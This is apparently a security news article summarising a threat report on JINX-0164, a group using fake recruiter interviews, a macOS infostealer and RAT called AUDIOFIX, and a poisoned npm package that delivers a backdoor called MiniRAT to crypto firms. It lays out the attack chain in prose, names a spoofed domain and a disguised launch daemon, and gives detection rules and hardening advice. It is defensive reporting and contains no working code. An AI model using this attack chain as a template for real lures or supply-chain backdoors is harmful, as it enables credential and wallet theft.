A newly identified threat group, tracked as JINX-0164, is using recruitment‑style social engineering and custom macOS payloads to infiltrate cryptocurrency companies, steal wallet credentials, and compromise CI/CD pipelines.
Fake Recruiter Lures Open the Door to macOS‑Only Malware
A previously unknown adversary, now catalogued by Wiz as JINX‑0164, has been running a focused campaign against cryptocurrency firms. The group blends classic recruitment scams with a chain of macOS‑specific payloads, ultimately aiming to harvest private keys, SSH credentials, and other assets that can be turned into crypto theft.
“The campaigns leveraged sophisticated social‑engineering techniques, custom macOS malware, and deep targeting of CI/CD infrastructure,” said Wiz researchers Shira Ayal, Eden Abergil, Andre Maccarone, Yuval Dan, and Benjamin Read.
How the Lure Works
- Credible LinkedIn profiles – Actors create polished recruiter accounts that mirror real hiring teams at blockchain startups.
- Virtual‑meeting invitation – Victims receive a calendar invite for a “technical interview.” The link points to a spoofed teleconference domain that looks like a legitimate service.
- Fake driver‑store page – When the meeting page loads, a pop‑up claims a missing audio driver. The user is directed to download a file from
apple.driver‑store[.]com. - Bash bootstrap – The downloaded script detects whether the host runs Intel or Apple Silicon, then pulls the appropriate payload.
- Payload disguise – The binary is named ChromeUpdater but registers as a launch daemon called
coreaudiod. It runs vialaunchctland drops a Python‑based infostealer called AUDIOFIX.
AUDIOFIX: More Than an Infostealer
AUDIOFIX is a hybrid of a data‑stealer and a remote‑access trojan (RAT). After installation it:
- Extracts passwords from password managers, browsers, and iCloud Keychain files.
- Harvests SSH keys, configuration files, console history, and cryptocurrency wallet extensions.
- Captures active sessions from Discord, Slack, and Telegram – a goldmine for social‑engineering follow‑ups.
- Executes arbitrary shell commands, exfiltrates files, and can delete evidence on demand.
- Provides a command‑and‑control interface that lets the attacker pull additional payloads.
The stolen data is then used to pivot into internal code‑distribution systems (e.g., private npm registries, CI pipelines). By injecting the AUDIOFIX binary into build agents, the group can modify source code to embed wallet‑draining logic before the software reaches production.
Supply‑Chain Twist: MiniRAT via a Poisoned npm Package
In a related operation, the same actors compromised the popular DeFi toolkit @velora‑dex/sdk. A malicious version of the package was published to the public npm registry. When developers installed the SDK, a post‑install script fetched a shell script that delivered a Go‑based backdoor named MiniRAT.
MiniRAT runs only on macOS, can upload files, execute arbitrary commands, and fetch further tools from attacker‑controlled servers. Because the SDK is used in many token‑swap and limit‑order bots, the backdoor provides a direct line into high‑value trading infrastructure.
Attribution Hints, Not Confirmation
The campaign’s use of VPN services like Astrill VPN and certain domain‑spoofing patterns resemble tactics seen in North‑Korean groups such as BlueNoroff, Contagious Interview, and UNC‑1069. However, Wiz’s telemetry shows no shared infrastructure with those actors, so attribution remains speculative.
Practical Takeaways for Crypto Companies and Developers
| Area | Recommended Action |
|---|---|
| Recruiter outreach | Verify any recruitment contact through official HR channels. Encourage employees to treat unsolicited interview invites with suspicion, especially if they involve downloading drivers or software. |
| Domain hygiene | Deploy DNS filtering that blocks known spoofed domains (apple.driver-store.com and similar). Use threat‑intel feeds that flag newly registered domains mimicking Apple services. |
| macOS endpoint protection | Enable Gatekeeper with the “App Store and identified developers” setting, and enforce notarization checks for any executable placed in /Library/LaunchDaemons or ~/Library/LaunchAgents. |
| CI/CD security | Restrict build agents to run with the least privilege, rotate secrets frequently, and sign all third‑party packages with a trusted key. Implement SLSA‑compatible provenance checks for npm dependencies. |
| npm package monitoring | Use tools like npm audit, OSS Index, or Snyk to watch for sudden changes in package metadata. Consider pinning critical SDK versions and mirroring them in a private registry. |
| Credential vaulting | Store API keys and wallet credentials in hardware‑backed secret managers (e.g., HashiCorp Vault, AWS Secrets Manager) rather than local keychains. |
| Incident response | If a macOS device shows a new launch daemon named ChromeUpdater or coreaudiod, isolate it immediately, collect the launchctl plist, and run a forensic scan with tools such as Velociraptor or OSQuery. |
Detecting the Threat
- Signature‑based detection: Look for the SHA‑256 hash of the
ChromeUpdaterbinary (published by Wiz in their advisory) and the MiniRAT Go binary. - Behavioral alerts: Trigger alerts on
launchctl loadcommands that reference files in/tmpor user‑writable directories, and on network connections to newly‑registered domains that resolve to known VPN exit nodes. - Supply‑chain monitoring: Integrate SLSA provenance verification into your CI pipelines to reject builds that contain unsigned or mismatched artifacts.
Final Thoughts
JINX‑0164 demonstrates how a well‑crafted social‑engineering front can open a pathway to sophisticated macOS malware, and how that malware can be leveraged to compromise the software supply chain of high‑value crypto operations. By tightening recruitment vetting, hardening macOS endpoint policies, and applying rigorous supply‑chain checks, organizations can cut off the most common entry points the group relies on.
For a deeper dive into the technical indicators and YARA rules, see Wiz’s full advisory here.
Comments
Please log in or register to join the discussion